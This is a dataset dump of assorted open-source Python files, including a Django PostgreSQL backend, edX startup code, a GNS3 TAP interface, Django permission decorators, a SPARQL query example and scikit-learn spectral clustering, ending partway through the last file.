code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
"""
PostgreSQL database backend for Django.
Requires psycopg 2: http://initd.org/projects/psycopg2
"""
import logging
import sys
from django.db.backends import *
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
from django.db.backends.postgresql_psycopg2.client import DatabaseClient
from django.db.backends.postgresql_psycopg2.creation import DatabaseCreation
from django.db.backends.postgresql_psycopg2.version import get_version
from django.db.backends.postgresql_psycopg2.introspection import DatabaseIntrospection
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeText, SafeBytes
from django.utils.timezone import utc
try:
import psycopg2 as Database
import psycopg2.extensions
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading psycopg2 module: %s" % e)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_adapter(SafeBytes, psycopg2.extensions.QuotedString)
psycopg2.extensions.register_adapter(SafeText, psycopg2.extensions.QuotedString)
logger = logging.getLogger('django.db.backends')
def utc_tzinfo_factory(offset):
if offset != 0:
raise AssertionError("database connection isn't set to UTC")
return utc
class DatabaseFeatures(BaseDatabaseFeatures):
needs_datetime_string_cast = False
can_return_id_from_insert = True
requires_rollback_on_dirty_transaction = True
has_real_datatype = True
can_defer_constraint_checks = True
has_select_for_update = True
has_select_for_update_nowait = True
has_bulk_insert = True
uses_savepoints = True
supports_tablespaces = True
supports_transactions = True
can_distinct_on_fields = True
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'postgresql'
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
Database = Database
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
opts = self.settings_dict["OPTIONS"]
RC = psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED
self.isolation_level = opts.get('isolation_level', RC)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def get_connection_params(self):
settings_dict = self.settings_dict
if not settings_dict['NAME']:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
conn_params = {
'database': settings_dict['NAME'],
}
conn_params.update(settings_dict['OPTIONS'])
if 'autocommit' in conn_params:
del conn_params['autocommit']
if 'isolation_level' in conn_params:
del conn_params['isolation_level']
if settings_dict['USER']:
conn_params['user'] = settings_dict['USER']
if settings_dict['PASSWORD']:
conn_params['password'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST']:
conn_params['host'] = settings_dict['HOST']
if settings_dict['PORT']:
conn_params['port'] = settings_dict['PORT']
return conn_params
def get_new_connection(self, conn_params):
return Database.connect(**conn_params)
def init_connection_state(self):
settings_dict = self.settings_dict
self.connection.set_client_encoding('UTF8')
tz = 'UTC' if settings.USE_TZ else settings_dict.get('TIME_ZONE')
if tz:
try:
get_parameter_status = self.connection.get_parameter_status
except AttributeError:
# psycopg2 < 2.0.12 doesn't have get_parameter_status
conn_tz = None
else:
conn_tz = get_parameter_status('TimeZone')
if conn_tz != tz:
self.connection.cursor().execute(
self.ops.set_time_zone_sql(), [tz])
# Commit after setting the time zone (see #17062)
self.connection.commit()
self.connection.set_isolation_level(self.isolation_level)
def create_cursor(self):
cursor = self.connection.cursor()
cursor.tzinfo_factory = utc_tzinfo_factory if settings.USE_TZ else None
return cursor
def close(self):
self.validate_thread_sharing()
if self.connection is None:
return
try:
self.connection.close()
self.connection = None
except Database.Error:
# In some cases (database restart, network connection lost etc...)
# the connection to the database is lost without giving Django a
# notification. If we don't set self.connection to None, the error
# will occur a every request.
self.connection = None
logger.warning('psycopg2 error while closing the connection.',
exc_info=sys.exc_info()
)
raise
finally:
self.set_clean()
def _set_isolation_level(self, isolation_level):
assert isolation_level in range(1, 5) # Use set_autocommit for level = 0
if self.psycopg2_version >= (2, 4, 2):
self.connection.set_session(isolation_level=isolation_level)
else:
self.connection.set_isolation_level(isolation_level)
def _set_autocommit(self, autocommit):
if self.psycopg2_version >= (2, 4, 2):
self.connection.autocommit = autocommit
else:
if autocommit:
level = psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT
else:
level = self.isolation_level
self.connection.set_isolation_level(level)
def check_constraints(self, table_names=None):
"""
To check constraints, we set constraints to immediate. Then, when, we're done we must ensure they
are returned to deferred.
"""
self.cursor().execute('SET CONSTRAINTS ALL IMMEDIATE')
self.cursor().execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
# Use a psycopg cursor directly, bypassing Django's utilities.
self.connection.cursor().execute("SELECT 1")
except DatabaseError:
return False
else:
return True
@cached_property
def psycopg2_version(self):
version = psycopg2.__version__.split(' ', 1)[0]
return tuple(int(v) for v in version.split('.'))
@cached_property
def pg_version(self):
with self.temporary_connection():
return get_version(self.connection)
|
zzeleznick/zDjango
|
venv/lib/python2.7/site-packages/django/db/backends/postgresql_psycopg2/base.py
|
Python
|
mit
| 7,566
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-20 01:51
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cs_questions', '0007_quizlist'),
]
operations = [
migrations.DeleteModel(
name='QuizResponse',
),
]
|
wilkerwma/codeschool
|
src/cs_questions/migrations/0008_delete_quizresponse.py
|
Python
|
gpl-3.0
| 360
|
"""
Module for code that should run during LMS startup
"""
# pylint: disable=unused-argument
from django.conf import settings
# Force settings to run so that the python path is modified
settings.INSTALLED_APPS # pylint: disable=pointless-statement
from openedx.core.lib.django_startup import autostartup
import edxmako
import logging
from monkey_patch import django_utils_translation
import analytics
log = logging.getLogger(__name__)
def run():
"""
Executed during django startup
"""
# Patch the xml libs.
from safe_lxml import defuse_xml_libs
defuse_xml_libs()
django_utils_translation.patch()
autostartup()
add_mimetypes()
if settings.FEATURES.get('USE_CUSTOM_THEME', False):
enable_theme()
if settings.FEATURES.get('USE_MICROSITES', False):
enable_microsites()
if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):
enable_third_party_auth()
# Initialize Segment.io analytics module. Flushes first time a message is received and
# every 50 messages thereafter, or if 10 seconds have passed since last flush
if settings.FEATURES.get('SEGMENT_IO_LMS') and hasattr(settings, 'SEGMENT_IO_LMS_KEY'):
analytics.init(settings.SEGMENT_IO_LMS_KEY, flush_at=50)
def add_mimetypes():
"""
Add extra mimetypes. Used in xblock_resource.
If you add a mimetype here, be sure to also add it in cms/startup.py.
"""
import mimetypes
mimetypes.add_type('application/vnd.ms-fontobject', '.eot')
mimetypes.add_type('application/x-font-opentype', '.otf')
mimetypes.add_type('application/x-font-ttf', '.ttf')
mimetypes.add_type('application/font-woff', '.woff')
def enable_theme():
"""
Enable the settings for a custom theme, whose files should be stored
in ENV_ROOT/themes/THEME_NAME (e.g., edx_all/themes/stanford).
"""
# Workaround for setting THEME_NAME to an empty
# string which is the default due to this ansible
# bug: https://github.com/ansible/ansible/issues/4812
if settings.THEME_NAME == "":
settings.THEME_NAME = None
return
assert settings.FEATURES['USE_CUSTOM_THEME']
settings.FAVICON_PATH = 'themes/{name}/images/favicon.ico'.format(
name=settings.THEME_NAME
)
# Calculate the location of the theme's files
theme_root = settings.ENV_ROOT / "themes" / settings.THEME_NAME
# Include the theme's templates in the template search paths
settings.TEMPLATE_DIRS.insert(0, theme_root / 'templates')
edxmako.paths.add_lookup('main', theme_root / 'templates', prepend=True)
# Namespace the theme's static files to 'themes/<theme_name>' to
# avoid collisions with default edX static files
settings.STATICFILES_DIRS.append(
(u'themes/{}'.format(settings.THEME_NAME), theme_root / 'static')
)
# Include theme locale path for django translations lookup
settings.LOCALE_PATHS = (theme_root / 'conf/locale',) + settings.LOCALE_PATHS
def enable_microsites():
"""
Enable the use of microsites, which are websites that allow
for subdomains for the edX platform, e.g. foo.edx.org
"""
microsites_root = settings.MICROSITE_ROOT_DIR
microsite_config_dict = settings.MICROSITE_CONFIGURATION
for ms_name, ms_config in microsite_config_dict.items():
# Calculate the location of the microsite's files
ms_root = microsites_root / ms_name
ms_config = microsite_config_dict[ms_name]
# pull in configuration information from each
# microsite root
if ms_root.isdir():
# store the path on disk for later use
ms_config['microsite_root'] = ms_root
template_dir = ms_root / 'templates'
ms_config['template_dir'] = template_dir
ms_config['microsite_name'] = ms_name
log.info('Loading microsite {0}'.format(ms_root))
else:
# not sure if we have application logging at this stage of
# startup
log.error('Error loading microsite {0}. Directory does not exist'.format(ms_root))
# remove from our configuration as it is not valid
del microsite_config_dict[ms_name]
# if we have any valid microsites defined, let's wire in the Mako and STATIC_FILES search paths
if microsite_config_dict:
settings.TEMPLATE_DIRS.append(microsites_root)
edxmako.paths.add_lookup('main', microsites_root)
settings.STATICFILES_DIRS.insert(0, microsites_root)
def enable_third_party_auth():
"""
Enable the use of third_party_auth, which allows users to sign in to edX
using other identity providers. For configuration details, see
common/djangoapps/third_party_auth/settings.py.
"""
from third_party_auth import settings as auth_settings
auth_settings.apply_settings(settings)
|
htzy/bigfour
|
lms/startup.py
|
Python
|
agpl-3.0
| 4,878
|
from leapp.utils.meta import with_metaclass
class PhaseMeta(type):
classes = []
def __new__(mcs, name, bases, attrs):
klass = super(PhaseMeta, mcs).__new__(mcs, name, bases, attrs)
PhaseMeta.classes.append(klass)
return klass
class Phase(with_metaclass(PhaseMeta)):
@classmethod
def get_index(cls):
return PhaseMeta.classes.index(cls)
|
vinzenz/prototype
|
leapp/workflows/phases.py
|
Python
|
apache-2.0
| 388
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os, sys, math, MySQLdb, click, time
import pandas as pd
from scripts.rais._to_df import to_df
from numpy import argsort
'''
Usage:
python gini.py -y 2013 -o data/rais/ -a bra -t rais_yb
'''
''' Connect to DB '''
db = MySQLdb.connect(host=os.environ["DATAVIVA_DB_HOST"], user=os.environ["DATAVIVA_DB_USER"],
passwd=os.environ["DATAVIVA_DB_PW"],
db=os.environ["DATAVIVA_DB_NAME"])
db.autocommit(1)
cursor = db.cursor()
depths_lookup = {
"bra": [1, 3, 5, 7, 9],
"cbo": [1, 4],
"cnae": [1, 3, 6]
}
table_lookup = {
"bra": "rais_yb",
"cbo": "rais_yo",
"cnae": "rais_yi"
}
def gini_coeff(x):
n = len(x)
s = x.sum()
r = argsort(argsort(-x)) # calculates zero-based ranks
return 1 - (2.0 * (r*x).sum() + s)/(n*s)
@click.command()
@click.option('-y', '--year', prompt='Year', help='year of the data to convert', required=True)
@click.option('output_path', '--output', '-o', help='Path to save files to.', type=click.Path(), required=True, prompt="Output path")
@click.option('--attr_type', '-a', type=click.Choice(['bra','cbo','cnae']), required=True, prompt="Attr Type")
def main(year, output_path, attr_type):
if "-" in year:
years = range(int(year.split('-')[0]), int(year.split('-')[1])+1)
else:
years = [int(year)]
print("years:", str(years))
for year in years:
start = time.time()
d = pd.HDFStore(os.path.join(output_path, str(year), 'rais_df_raw.h5'))
if "rais_df" in d:
rais_df = d['rais_df']
else:
file_path = os.path.join(output_path,'Rais_{}.csv.bz2'.format(year))
rais_df = to_df(file_path)
d['rais_df'] = rais_df
for depth in depths_lookup[attr_type]:
print("\n{} depth: {}\n".format(attr_type, depth))
this_depth_df = rais_df.copy()
this_depth_df['{}_id'.format(attr_type)] = this_depth_df['{}_id'.format(attr_type)].str.slice(0, depth)
uniqs = this_depth_df["{}_id".format(attr_type)].unique()[::-1]
for i, id in enumerate(uniqs):
this_id_df = this_depth_df[this_depth_df['{}_id'.format(attr_type)] == id]
if len(this_id_df.index) < 10:
print("\nNot enough occurences for histogram thus no GINI (need at least 10)")
continue
print("********* {}: {} ({}/{}) *********".format(year, id, i+1, len(uniqs)), end='\r')
sys.stdout.flush()
wage = this_id_df["wage"]
gini = gini_coeff(wage)
# print(gini)
table = table_lookup[attr_type]
cursor.execute("update {} set gini=%s where year=%s and {}_id=%s".format(table, attr_type), (gini, year, id))
# raw_input('')
d.close()
print("\n\n--- %s minutes ---\n\n" % str((time.time() - start)/60))
if __name__ == "__main__":
main()
|
DataViva/dataviva-scripts
|
scripts/rais/gini.py
|
Python
|
mit
| 3,050
|
import time
import hark.guest
import hark.log
from hark.lib.command import which, Command
class BaseDriver(object):
def __init__(self, machine):
self.machine = machine
self.guest_config = hark.guest.guest_config(machine['guest'])
@classmethod
def commandPath(cls):
# subclass is expected to set cmd
return which(cls.cmd)
@classmethod
def isAvailable(cls):
return cls.commandPath() is not None
@classmethod
def version(cls):
cmd = Command(cls.cmd, cls.versionArg)
res = cmd.assertRun()
return res.stdout.strip()
def assertStatus(self, msg, *valid_statuses):
"""
Given a machine driver instance, throw hark.exceptions.InvalidStatus
unless the status of the machine is in the specified set.
msg is a message which will be used to format the exception.
"""
s = self.status()
if s not in valid_statuses:
fmt = ', '.join(["'%s'" % str(st) for st in valid_statuses])
raise hark.exceptions.InvalidStatus(
"cannot remove a machine unless it's stopped: "
"status is '%s' and needs to be one of (%s)" % (s, fmt))
def waitStatus(self, status, interval_ms=1000):
hark.log.info('Waiting for machine %s status to be %s' % (
self.machine['name'], status))
while True:
if self.status() == status:
return
time.sleep(interval_ms / 1000)
|
ceralena/hark
|
src/hark/driver/base.py
|
Python
|
gpl-3.0
| 1,509
|
import pytest
import numpy as np
import dask.array as da
from dask.array.numpy_compat import _make_sliced_dtype
from dask.array.utils import assert_eq
@pytest.fixture(params=[
[('A', ('f4', (3, 2))), ('B', ('f4', 3)), ('C', ('f8', 3))],
[('A', ('i4', (3, 2))), ('B', ('f4', 3)), ('C', ('S4', 3))],
])
def dtype(request):
return np.dtype(request.param)
@pytest.fixture(params=[
['A'],
['A', 'B'],
['A', 'B', 'C'],
])
def index(request):
return request.param
def test_basic():
# sanity check
dtype = [('a', 'f8'), ('b', 'f8'), ('c', 'f8')]
x = np.ones((5, 3), dtype=dtype)
dx = da.ones((5, 3), dtype=dtype, chunks=3)
result = dx[['a', 'b']]
expected = x[['a', 'b']]
assert_eq(result, expected)
def test_slice_dtype(dtype, index):
result = _make_sliced_dtype(dtype, index)
expected = np.ones((5, len(dtype)), dtype=dtype)[index].dtype
assert result == expected
|
kenshay/ImageScript
|
ProgramData/SystemFiles/Python/Lib/site-packages/dask/array/tests/test_numpy_compat.py
|
Python
|
gpl-3.0
| 935
|
# coding=utf-8
"""
permission_required decorator for generic classbased/functionbased view
"""
__author__ = 'mark'
from functools import wraps
from django.http import HttpRequest
from django.utils.decorators import available_attrs
from django.core.exceptions import PermissionDenied
from permission.decorators.utils import redirect_to_login
def permission_required(perm, queryset=None,
login_url=None, raise_exception=False):
"""
Permission check decorator for classbased/functionbased generic view
This decorator works as method or function decorator
DO NOT use ``method_decorator`` or whatever while this decorator will use
``self`` argument for method of classbased generic view.
Parameters
----------
perm : string
A permission string
queryset_or_model : queryset or model
A queryset or model for finding object.
With classbased generic view, ``None`` for using view default queryset.
When the view does not define ``get_queryset``, ``queryset``,
``get_object``, or ``object`` then ``obj=None`` is used to check
permission.
With functional generic view, ``None`` for using passed queryset.
When non queryset was passed then ``obj=None`` is used to check
permission.
Examples
--------
>>> # As method decorator
>>> class UpdateAuthUserView(UpdateView):
>>> @permission_required('auth.change_user')
>>> def dispatch(self, request, *args, **kwargs):
... pass
>>> # As function decorator
>>> @permission_required('auth.change_user')
>>> def update_auth_user(request, *args, **kwargs):
... pass
"""
def wrapper(view_method):
@wraps(view_method, assigned=available_attrs(view_method))
def inner(self, request=None, *args, **kwargs):
if isinstance(self, HttpRequest):
from permission.decorators.functionbase import \
permission_required as decorator
# this is a functional view not classbased view.
decorator = decorator(perm, queryset,
login_url, raise_exception)
decorator = decorator(view_method)
if not request:
args = list(args)
args.insert(0, request)
request = self
return decorator(request, *args, **kwargs)
else:
from permission.decorators.classbase import \
get_object_from_classbased_instance
# get object
obj = get_object_from_classbased_instance(
self, queryset, request, *args, **kwargs
)
if not request.user.has_perm(perm, obj=obj):
if raise_exception:
raise PermissionDenied
else:
return redirect_to_login(request, login_url)
return view_method(self, request, *args, **kwargs)
return inner
return wrapper
|
somcomltd/django-rbac
|
rbac/decorators/methodbase.py
|
Python
|
mit
| 3,130
|
# filename: ex363.py
# Query Linked Movie database endpoint about common actors of
# two directors and output HTML page with links to Freebase.
from SPARQLWrapper import SPARQLWrapper, JSON
director1 = "Steven Spielberg"
director2 = "Stanley Kubrick"
sparql = SPARQLWrapper("http://data.linkedmdb.org/sparql")
queryString = """
PREFIX m: <http://data.linkedmdb.org/resource/movie/>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
SELECT DISTINCT ?actorName ?freebaseURI WHERE {
?dir1 m:director_name "DIR1-NAME" .
?dir2 m:director_name "DIR2-NAME" .
?dir1film m:director ?dir1 ;
m:actor ?actor .
?dir2film m:director ?dir2 ;
m:actor ?actor .
?actor m:actor_name ?actorName ;
foaf:page ?freebaseURI .
}
"""
queryString = queryString.replace("DIR1-NAME",director1)
queryString = queryString.replace("DIR2-NAME",director2)
sparql.setQuery(queryString)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print """
<html><head><title>results</title>
<style type="text/css"> * { font-family: arial,helvetica}</style>
</head><body>
"""
print "<h1>Actors directed by both " + director1 + " and " + director2 + "</h1>"
if (len(results["results"]["bindings"]) == 0):
print "<p>No results found.</p>"
else:
for result in results["results"]["bindings"]:
actorName = result["actorName"]["value"]
freebaseURI = result["freebaseURI"]["value"]
print "<p><a href=\"" + freebaseURI + "\">" + actorName + "</p>"
print "</body></html>"
|
agazzarini/SolRDF
|
solrdf/solrdf-integration-tests/src/test/resources/LearningSPARQLExamples/ex363.py
|
Python
|
apache-2.0
| 1,592
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Interface for TAP NIOs (UNIX based OSes only).
"""
import asyncio
import uuid
from .nio import NIO
import logging
log = logging.getLogger(__name__)
class NIOTAP(NIO):
"""
Dynamips TAP NIO.
:param hypervisor: Dynamips hypervisor instance
:param tap_device: TAP device name (e.g. tap0)
"""
def __init__(self, hypervisor, tap_device):
# create an unique name
name = 'tap-{}'.format(uuid.uuid4())
self._tap_device = tap_device
super().__init__(name, hypervisor)
@asyncio.coroutine
def create(self):
yield from self._hypervisor.send("nio create_tap {name} {tap}".format(name=self._name, tap=self._tap_device))
log.info("NIO TAP {name} created with device {device}".format(name=self._name, device=self._tap_device))
@property
def tap_device(self):
"""
Returns the TAP device used by this NIO.
:returns: the TAP device name
"""
return self._tap_device
def __json__(self):
return {"type": "nio_tap",
"tap_device": self._tap_device}
|
harrijs/gns3-server
|
gns3server/modules/dynamips/nios/nio_tap.py
|
Python
|
gpl-3.0
| 1,806
|
"""Algorithms for spectral clustering"""
# Author: Gael Varoquaux gael.varoquaux@normalesup.org
# Brian Cheung
# Wei LI <kuantkid@gmail.com>
# License: BSD
import warnings
import numpy as np
from ..base import BaseEstimator, ClusterMixin
from ..utils import check_random_state, as_float_array
from ..utils.extmath import norm
from ..metrics.pairwise import rbf_kernel
from ..neighbors import kneighbors_graph
from ..manifold import spectral_embedding
from .k_means_ import k_means
def discretize(vectors, copy=True, max_svd_restarts=30, n_iter_max=20,
random_state=None):
"""Search for a partition matrix (clustering) which is closest to the
eigenvector embedding.
Parameters
----------
vectors : array-like, shape: (n_samples, n_clusters)
The embedding space of the samples.
copy : boolean, optional, default: True
Whether to copy vectors, or perform in-place normalization.
max_svd_restarts : int, optional, default: 30
Maximum number of attempts to restart SVD if convergence fails
n_iter_max : int, optional, default: 30
Maximum number of iterations to attempt in rotation and partition
matrix search if machine precision convergence is not reached
random_state: int seed, RandomState instance, or None (default)
A pseudo random number generator used for the initialization of the
of the rotation matrix
Returns
-------
labels : array of integers, shape: n_samples
The labels of the clusters.
References
----------
- Multiclass spectral clustering, 2003
Stella X. Yu, Jianbo Shi
http://www1.icsi.berkeley.edu/~stellayu/publication/doc/2003kwayICCV.pdf
Notes
-----
The eigenvector embedding is used to iteratively search for the
closest discrete partition. First, the eigenvector embedding is
normalized to the space of partition matrices. An optimal discrete
partition matrix closest to this normalized embedding multiplied by
an initial rotation is calculated. Fixing this discrete partition
matrix, an optimal rotation matrix is calculated. These two
calculations are performed until convergence. The discrete partition
matrix is returned as the clustering solution. Used in spectral
clustering, this method tends to be faster and more robust to random
initialization than k-means.
"""
from scipy.sparse import csc_matrix
from scipy.linalg import LinAlgError
random_state = check_random_state(random_state)
vectors = as_float_array(vectors, copy=copy)
eps = np.finfo(float).eps
n_samples, n_components = vectors.shape
# Normalize the eigenvectors to an equal length of a vector of ones.
# Reorient the eigenvectors to point in the negative direction with respect
# to the first element. This may have to do with constraining the
# eigenvectors to lie in a specific quadrant to make the discretization
# search easier.
norm_ones = np.sqrt(n_samples)
for i in range(vectors.shape[1]):
vectors[:, i] = (vectors[:, i] / norm(vectors[:, i])) \
* norm_ones
if vectors[0, i] != 0:
vectors[:, i] = -1 * vectors[:, i] * np.sign(vectors[0, i])
# Normalize the rows of the eigenvectors. Samples should lie on the unit
# hypersphere centered at the origin. This transforms the samples in the
# embedding space to the space of partition matrices.
vectors = vectors / np.sqrt((vectors ** 2).sum(axis=1))[:, np.newaxis]
svd_restarts = 0
has_converged = False
# If there is an exception we try to randomize and rerun SVD again
# do this max_svd_restarts times.
while (svd_restarts < max_svd_restarts) and not has_converged:
# Initialize first column of rotation matrix with a row of the
# eigenvectors
rotation = np.zeros((n_components, n_components))
rotation[:, 0] = vectors[random_state.randint(n_samples), :].T
# To initialize the rest of the rotation matrix, find the rows
# of the eigenvectors that are as orthogonal to each other as
# possible
c = np.zeros(n_samples)
for j in range(1, n_components):
# Accumulate c to ensure row is as orthogonal as possible to
# previous picks as well as current one
c += np.abs(np.dot(vectors, rotation[:, j - 1]))
rotation[:, j] = vectors[c.argmin(), :].T
last_objective_value = 0.0
n_iter = 0
while not has_converged:
n_iter += 1
t_discrete = np.dot(vectors, rotation)
labels = t_discrete.argmax(axis=1)
vectors_discrete = csc_matrix(
(np.ones(len(labels)), (np.arange(0, n_samples), labels)),
shape=(n_samples, n_components))
t_svd = vectors_discrete.T * vectors
try:
U, S, Vh = np.linalg.svd(t_svd)
svd_restarts += 1
except LinAlgError:
print "SVD did not converge, randomizing and trying again"
break
ncut_value = 2.0 * (n_samples - S.sum())
if ((abs(ncut_value - last_objective_value) < eps) or
(n_iter > n_iter_max)):
has_converged = True
else:
# otherwise calculate rotation and continue
last_objective_value = ncut_value
rotation = np.dot(Vh.T, U.T)
if not has_converged:
raise LinAlgError('SVD did not converge')
return labels
def spectral_clustering(affinity, n_clusters=8, n_components=None,
eigen_solver=None, random_state=None, n_init=10,
k=None, eigen_tol=0.0,
assign_labels='kmeans',
mode=None):
"""Apply clustering to a projection to the normalized laplacian.
In practice Spectral Clustering is very useful when the structure of
the individual clusters is highly non-convex or more generally when
a measure of the center and spread of the cluster is not a suitable
description of the complete cluster. For instance when clusters are
nested circles on the 2D plan.
If affinity is the adjacency matrix of a graph, this method can be
used to find normalized graph cuts.
Parameters
-----------
affinity: array-like or sparse matrix, shape: (n_samples, n_samples)
The affinity matrix describing the relationship of the samples to
embed. **Must be symetric**.
Possible examples:
- adjacency matrix of a graph,
- heat kernel of the pairwise distance matrix of the samples,
- symmetic k-nearest neighbours connectivity matrix of the samples.
n_clusters: integer, optional
Number of clusters to extract.
n_components: integer, optional, default is k
Number of eigen vectors to use for the spectral embedding
eigen_solver: {None, 'arpack' or 'amg'}
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities
random_state: int seed, RandomState instance, or None (default)
A pseudo random number generator used for the initialization
of the lobpcg eigen vectors decomposition when eigen_solver == 'amg'
and by the K-Means initialization.
n_init: int, optional, default: 10
Number of time the k-means algorithm will be run with different
centroid seeds. The final results will be the best output of
n_init consecutive runs in terms of inertia.
eigen_tol : float, optional, default: 0.0
Stopping criterion for eigendecomposition of the Laplacian matrix
when using arpack eigen_solver.
assign_labels : {'kmeans', 'discretize'}, default: 'kmeans'
The strategy to use to assign labels in the embedding
space. There are two ways to assign labels after the laplacian
embedding. k-means can be applied and is a popular choice. But it can
also be sensitive to initialization. Discretization is another
approach which is less sensitive to random initialization.
Returns
-------
labels: array of integers, shape: n_samples
The labels of the clusters.
References
----------
- Normalized cuts and image segmentation, 2000
Jianbo Shi, Jitendra Malik
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
- A Tutorial on Spectral Clustering, 2007
Ulrike von Luxburg
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323
- Multiclass spectral clustering, 2003
Stella X. Yu, Jianbo Shi
http://www1.icsi.berkeley.edu/~stellayu/publication/doc/2003kwayICCV.pdf
Notes
------
The graph should contain only one connect component, elsewhere
the results make little sense.
This algorithm solves the normalized cut for k=2: it is a
normalized spectral clustering.
"""
if not assign_labels in ('kmeans', 'discretize'):
raise ValueError("The 'assign_labels' parameter should be "
"'kmeans' or 'discretize', but '%s' was given"
% assign_labels)
if not k is None:
warnings.warn("'k' was renamed to n_clusters and will "
"be removed in 0.15.",
DeprecationWarning)
n_clusters = k
if not mode is None:
warnings.warn("'mode' was renamed to eigen_solver "
"and will be removed in 0.15.",
DeprecationWarning)
eigen_solver = mode
random_state = check_random_state(random_state)
n_components = n_clusters if n_components is None else n_components
maps = spectral_embedding(affinity, n_components=n_components,
eigen_solver=eigen_solver,
random_state=random_state,
eigen_tol=eigen_tol, drop_first=False)
if assign_labels == 'kmeans':
_, labels, _ = k_means(maps, n_clusters, random_state=random_state,
n_init=n_init)
else:
labels = discretize(maps, random_state=random_state)
return labels
class SpectralClustering(BaseEstimator, ClusterMixin):
"""Apply clustering to a projection to the normalized laplacian.
In practice Spectral Clustering is very useful when the structure of
the individual clusters is highly non-convex or more generally when
a measure of the center and spread of the cluster is not a suitable
description of the complete cluster. For instance when clusters are
nested circles on the 2D plan.
If affinity is the adjacency matrix of a graph, this method can be
used to find normalized graph cuts.
When calling ``fit``, an affinity matrix is constructed using either the
Gaussian (aka RBF) kernel of the euclidean distanced ``d(X, X)``::
np.exp(-gamma * d(X,X) ** 2)
or a k-nearest neighbors connectivity matrix.
Alternatively, using ``precomputed``, a user-provided affinity
matrix can be used.
Parameters
-----------
n_clusters : integer, optional
The dimension of the projection subspace.
affinity: string, 'nearest_neighbors', 'rbf' or 'precomputed'
gamma: float
Scaling factor of Gaussian (rbf) affinity kernel. Ignored for
``affinity='nearest_neighbors'``.
n_neighbors: integer
Number of neighbors to use when constructing the affinity matrix using
the nearest neighbors method. Ignored for ``affinity='rbf'``.
eigen_solver: {None, 'arpack' or 'amg'}
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used for the initialization
of the lobpcg eigen vectors decomposition when eigen_solver == 'amg'
and by the K-Means initialization.
n_init : int, optional, default: 10
Number of time the k-means algorithm will be run with different
centroid seeds. The final results will be the best output of
n_init consecutive runs in terms of inertia.
eigen_tol : float, optional, default: 0.0
Stopping criterion for eigendecomposition of the Laplacian matrix
when using arpack eigen_solver.
assign_labels : {'kmeans', 'discretize'}, default: 'kmeans'
The strategy to use to assign labels in the embedding
space. There are two ways to assign labels after the laplacian
embedding. k-means can be applied and is a popular choice. But it can
also be sensitive to initialization. Discretization is another approach
which is less sensitive to random initialization.
Attributes
----------
`affinity_matrix_` : array-like, shape (n_samples, n_samples)
Affinity matrix used for clustering. Available only if after calling
``fit``.
`labels_` :
Labels of each point
Notes
-----
If you have an affinity matrix, such as a distance matrix,
for which 0 means identical elements, and high values means
very dissimilar elements, it can be transformed in a
similarity matrix that is well suited for the algorithm by
applying the Gaussian (RBF, heat) kernel::
np.exp(- X ** 2 / (2. * delta ** 2))
Another alternative is to take a symmetric version of the k
nearest neighbors connectivity matrix of the points.
If the pyamg package is installed, it is used: this greatly
speeds up computation.
References
----------
- Normalized cuts and image segmentation, 2000
Jianbo Shi, Jitendra Malik
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
- A Tutorial on Spectral Clustering, 2007
Ulrike von Luxburg
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323
- Multiclass spectral clustering, 2003
Stella X. Yu, Jianbo Shi
http://www1.icsi.berkeley.edu/~stellayu/publication/doc/2003kwayICCV.pdf
"""
def __init__(self, n_clusters=8, eigen_solver=None, random_state=None,
n_init=10, gamma=1., affinity='rbf', n_neighbors=10, k=None,
eigen_tol=0.0, assign_labels='kmeans', mode=None):
if k is not None:
warnings.warn("'k' was renamed to n_clusters and "
